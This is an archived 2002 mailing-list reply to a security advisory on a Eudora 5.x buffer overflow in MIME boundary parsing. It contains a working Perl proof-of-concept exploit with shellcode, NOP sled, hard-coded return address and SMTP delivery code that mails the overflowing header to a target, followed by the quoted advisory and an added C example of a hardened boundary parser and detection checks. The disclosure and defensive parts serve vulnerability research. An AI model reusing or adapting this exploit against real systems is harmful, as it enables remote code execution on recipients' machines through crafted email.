Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability

From: Kanatoko (anvilat_private)
Date: Mon Aug 05 2002 - 23:49:24 PDT


    This is a proof-of-concept exploit for the Eudora 5.x buffer overflow.
    
    Tested on:
      Japanese Windows 2000 Professional SP2
      Eudora Version 5.0.2-Jr2
    
    
    #!/usr/local/bin/perl
    
    #---------------------------------------------------------------------
    # Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
    # written by Kanatoko <anvilat_private>
    # http://www.jumperz.net/
    #---------------------------------------------------------------------
    
    use strict;
    use warnings;
    use Socket;
    
    # The message is handed to an SMTP relay; the overflow fires later, when
    # the recipient's Eudora parses the oversized MIME boundary parameter.
    my $connect_host = 'mail.jumperz.net';
    my $port         = 25;
    my $env_from     = 'anvilat_private';    # SMTP envelope sender
    my $env_to       = 'targetat_private';   # SMTP envelope recipient
    my $from         = 'anvilat_private';    # From: header
    my $to           = 'targetat_private';   # To: header
    
    my $iaddr     = inet_aton($connect_host) || die "Host Resolve Error.\n";
    my $sock_addr = pack_sockaddr_in($port, $iaddr);
    socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "Socket Error.\n";
    connect(SOCKET, $sock_addr)             || die "Connect Error\n";
    select(SOCKET); $| = 1; select(STDOUT);   # unbuffered writes to the socket
    
    # Read one SMTP reply. Continuation lines ("220-...") are consumed too,
    # so a multi-line greeting does not put the dialogue below out of step.
    sub smtp_reply {
        my $line;
        while (defined($line = <SOCKET>)) {
            last unless $line =~ /^\d{3}-/;
        }
        return $line;
    }
    
    # egg written by UNYUN (http://www.shadowpenguin.org/)
    # 57 bytes: finds its own address on the stack with a call/pop, writes the
    # NUL that terminates the 11-byte command name appended after it, calls a
    # hard-coded API address with (string, 5), then spins in a NOP/JMP loop.
    my $egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
    $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
    $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
    $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
    $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
    $egg .= "notepad.exe";
    
    # Payload layout (186 bytes in total), delivered as the boundary parameter
    # of the Content-Type header:
    #   121 x NOP | 57-byte egg | JMP -0x60 | 2 pad | saved return address
    my $buf  = "\x90" x 121;
    $buf .= $egg;
    $buf .= "\xEB\xA0";            # JMP -0x60: short jump back into the NOP sled
    $buf .= "A" x 2;
    $buf .= "\x97\xAC\xE3\x77";    # 0x77e3ac97 JMP EBX in user32.dll (return address)
    
    smtp_reply();                                   # 220 banner
    print SOCKET "HELO hoge\x0D\x0A";
    smtp_reply();
    print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
    smtp_reply();
    print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
    smtp_reply();
    print SOCKET "DATA\x0D\x0A";
    smtp_reply();                                   # 354: send message
    
    # The malicious boundary is the whole payload; the message carries no body
    # parts, only the header that triggers the parse.
    my $msg  = "MIME-Version: 1.0\x0D\x0A";
    $msg    .= "From: $from\x0D\x0A";
    $msg    .= "To: $to\x0D\x0A";
    $msg    .= "Content-Type: multipart/mixed; boundary=\"$buf\"\x0D\x0A";
    $msg    .= "\x0D\x0A";
    $msg    .= ".\x0D\x0A";                         # end of DATA
    print SOCKET $msg;
    smtp_reply();
    print SOCKET "QUIT\x0D\x0A";
    smtp_reply();
    close(SOCKET);
    
    
    -- 
    Kanatoko  <anvilat_private>
    JUMPER : http://www.jumperz.net/(Japanese)
    
    
    On Mon, 05 Aug 2002 15:24:25 +0900
    snsadvat_private wrote:
    
    > ----------------------------------------------------------------------
    > SNS Advisory No.55
    > Eudora 5.x for Windows Buffer Overflow Vulnerability
    > 
    > Problem first discovered: 6 Jun 2002
    > Published: 5 Aug 2002
    > ----------------------------------------------------------------------
    > 
    > Overview:
    > ---------
    >   Eudora 5.x for Windows contains a buffer overflow vulnerability, 
    >   which could allow a remote attacker to execute arbitrary code.
    > 
    > Problem Description:
    > --------------------
    >   Eudora, developed and distributed by QUALCOMM Inc. 
    >   (http://www.qualcomm.com/), is a Mail User Agent that runs on Windows 
    >   95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
    > 
    >   The buffer overflow occurs when Eudora receives a message using a long
    >   string as a boundary, which is used to divide a multi-part message into
    >   separate parts.  In our verification environment, we have found that 
    >   this could allow arbitrary commands to be executed. 
    > 
    > Tested Version:
    > ---------------
    >   Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
    >   Eudora 5.1.1 for Windows (Sponsored Mode) [English]
    > 
    > Tested OS:
    > ----------
    >   Microsoft Windows 2000 Professional SP2 [Japanese]
    >   Microsoft Windows 98 SE [Japanese]
    > 
    > Solution:
    > ---------
    >   The problem will be fixed in the next release of Eudora.
    >   The vendor has not reported when the next release will be available.
    > 
    > Communication background:
    > -------------------------
    >  6 Jun 2002  : We discovered the vulnerability.
    >  6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd.
    >                (user support for the Japanese version).
    >  14 Jun 2002 : The findings were reported again to Livin' on the EDGE Co.,
    >                Ltd.
    >  17 Jun 2002 : We contacted QUALCOMM Inc.
    >  18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
    >                investigation of the problem.
    >  3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
    >                investigation.
    >  19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
    >                investigation.
    >  24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
    >                of this advisory.
    >  25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
    >                the next release.
    >  5 Aug 2002  : We decided to disclose this vulnerability due to concern
    >                over the potential consequences this issue may cause.
    >                Livin' on the EDGE Co., Ltd. has not provided any comments
    >                on this issue as of August 5, 2002.
    > 
    > Discovered by:
    > --------------
    >   Nobuo Miwa (LAC / n-miwaat_private)
    > 
    > Disclaimer:
    > -----------
    >   All information in these advisories is subject to change without 
    >   advance notice or mutual consensus, and each of them is released 
    >   as is. LAC Co., Ltd. is not responsible for any risks or occurrences 
    >   caused by applying this information.
    > 
    > ------------------------------------------------------------------
    > SecureNet Service(SNS) Security Advisory <snsadvat_private>
    > Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
    > 
    > 
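
The buffer layout in the script above and the advisory's description of the bug (an over-long boundary parameter copied into a fixed-size buffer) can be checked with the C program below. It is an added example, not Kanatoko's, LAC's or QUALCOMM's code: Eudora's faulty parser was never published, so the `char boundary[128]; strcpy(...)` shape in the comment is an assumed illustration of the bug class, while the 70-character limit and the allowed character set come from RFC 2046 section 5.1.1. `parse_boundary()` is a hardened parser that bounds the copy by both the RFC limit and the destination size and rejects bytes a boundary can never contain; `poc_buffer_len()` and `poc_jmp_target()` recompute the PoC's 186-byte layout and confirm that the `EB A0` short jump lands inside the NOP sled. The Content-Type headers it parses are constructed for the demonstration, not captured traffic.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* RFC 2046 5.1.1: a boundary is 1 to 70 "bchars" and must not end in a space.
 * bchars = DIGIT / ALPHA / "'" "(" ")" "+" "_" "," "-" "." "/" ":" "=" "?" / SPACE */
#define BOUNDARY_MAX 70

enum { BND_OK = 0, BND_ABSENT = -1, BND_INVALID = -2 };

static int is_bchar(unsigned char c)
{
    if (isalnum(c)) return 1;
    return c != '\0' && strchr("'()+_,-./:=? ", c) != NULL;
}

/* Case-insensitive search for a parameter name such as "boundary=". */
static const char *find_param(const char *s, const char *name)
{
    size_t n = strlen(name);
    for (; *s; s++) {
        size_t i;
        for (i = 0; i < n &&
             tolower((unsigned char)s[i]) == tolower((unsigned char)name[i]); i++)
            ;
        if (i == n) return s + n;
    }
    return NULL;
}

/* Assumed shape of the bug class in the advisory (NOT Eudora's real code,
 * which was never published):
 *
 *     char boundary[128];
 *     strcpy(boundary, param_value);   // length never checked -> stack smash
 *
 * The hardened version below bounds the copy by the RFC limit and by the
 * destination size, and rejects bytes that cannot occur in a boundary.
 * Returns the boundary length, BND_ABSENT, or BND_INVALID. */
int parse_boundary(const char *ctype, char *out, size_t outsz)
{
    const char *p = find_param(ctype, "boundary=");
    const char *end;
    if (!p) return BND_ABSENT;
    if (*p == '"') {                        /* quoted-string form */
        p++;
        end = strchr(p, '"');
        if (!end) return BND_INVALID;
    } else {                                /* token form: ends at ';' or whitespace */
        end = p + strcspn(p, "; \t\r\n");
    }
    size_t len = (size_t)(end - p);
    if (len == 0 || len > BOUNDARY_MAX || p[len - 1] == ' ') return BND_INVALID;
    for (size_t i = 0; i < len; i++)
        if (!is_bchar((unsigned char)p[i])) return BND_INVALID;
    if (len >= outsz) return BND_INVALID;   /* never trust the source length */
    memcpy(out, p, len);
    out[len] = '\0';
    return (int)len;
}

/* Status only, using an internal buffer sized to the RFC maximum. */
int boundary_status(const char *ctype)
{
    char buf[BOUNDARY_MAX + 1];
    int r = parse_boundary(ctype, buf, sizeof buf);
    return r < 0 ? r : BND_OK;
}

/* Layout of the PoC buffer from the post: 121 NOPs, 57-byte egg, 2-byte
 * short JMP, 2 bytes of padding, 4-byte saved-return-address overwrite. */
enum { SLED = 121, EGG = 57, JMP = 2, PAD = 2, RET = 4 };

int poc_buffer_len(void) { return SLED + EGG + JMP + PAD + RET; }   /* 186 */

/* "EB A0" is JMP rel8 with rel8 = 0xA0 = -0x60, taken from the next
 * instruction; the result is the offset the jump lands on. */
int poc_jmp_target(void)
{
    int rel8 = 0xA0 - 0x100;                /* -96 */
    return SLED + EGG + JMP + rel8;         /* 180 - 96 = 84, inside the sled */
}

/* Constructed sample headers for the demonstration (not captured traffic). */
static const char LEGIT_CTYPE[] =
    "multipart/mixed; boundary=\"----=_NextPart_000_0012_01C23C4D.5A3B6E20\"";
static const char RAWBYTE_CTYPE[] =
    "multipart/mixed; boundary=\"\x90\x90\x90" "AB\"";   /* NOP bytes in a boundary */

/* A Content-Type whose boundary is as long as the PoC payload (186 bytes). */
const char *poc_ctype(void)
{
    static char hdr[32 + 256];
    memset(hdr, 0, sizeof hdr);
    strcpy(hdr, "multipart/mixed; boundary=\"");
    memset(hdr + strlen(hdr), 'A', (size_t)poc_buffer_len());
    strcat(hdr, "\"");
    return hdr;
}

int main(void)
{
    char out[BOUNDARY_MAX + 1];
    printf("legit   -> %d (%s)\n", parse_boundary(LEGIT_CTYPE, out, sizeof out), out);
    printf("poc     -> %d (boundary of %d bytes)\n", boundary_status(poc_ctype()), poc_buffer_len());
    printf("rawbyte -> %d\n", boundary_status(RAWBYTE_CTYPE));
    printf("JMP -0x60 lands at offset %d (sled is 0..%d)\n", poc_jmp_target(), SLED - 1);
    return 0;
}
```

Build with `cc -o boundary boundary.c && ./boundary`. The same two checks (length over 70, or any byte outside the bchars set) are what a mail gateway or IDS rule can apply to the Content-Type header to flag this class of payload before a client like Eudora ever parses it, since a standards-conforming sender never produces either.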
    



    This archive was generated by hypermail 2b30 : Tue Aug 06 2002 - 12:20:31 PDT